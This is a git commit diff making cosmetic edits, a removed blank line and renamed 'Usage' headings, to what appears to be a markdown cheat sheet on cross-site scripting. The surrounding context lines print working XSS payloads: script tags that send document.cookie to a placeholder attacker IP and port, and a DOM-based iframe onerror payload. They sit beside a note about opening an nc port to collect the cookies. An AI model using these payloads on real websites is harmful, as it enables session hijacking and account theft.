cleanup
This commit is contained in:
parent
a5459ae447
commit
bb4cd3b7d1
|
@ -35,7 +35,6 @@ Open nc port and collect cookies
|
|||
```javascript
|
||||
<script>document.location='http://<attacker-IP>:<attacker-Port>/XSS/grabber.php?c='+document.cookie</script>
|
||||
<script>var i=new Image;i.src="http://<attacker-IP>:<attacker-Port>/?"+document.cookie;</script>
|
||||
|
||||
```
|
||||
|
||||
## Reflected XSS
|
||||
|
@ -48,7 +47,7 @@ into clicking a URL to execute their malicious payload.
|
|||
* URL parameters inside GET queries
|
||||
* File paths
|
||||
|
||||
### Usage
|
||||
### Reflected XSS Usage
|
||||
|
||||
As script inside parameter
|
||||
|
||||
|
@ -106,7 +105,7 @@ page.
|
|||
<iframe src="https://vulnerable-website.com#" onload="this.src+='<img src=1 onerror=alert(1)>'">
|
||||
```
|
||||
|
||||
### Usage
|
||||
### DOM based Usage
|
||||
|
||||
Find the sub-object inside the document through ending the string and execute a
|
||||
javascript alert when hovering over the sub-object.
|
||||
|
|
Loading…
Reference in New Issue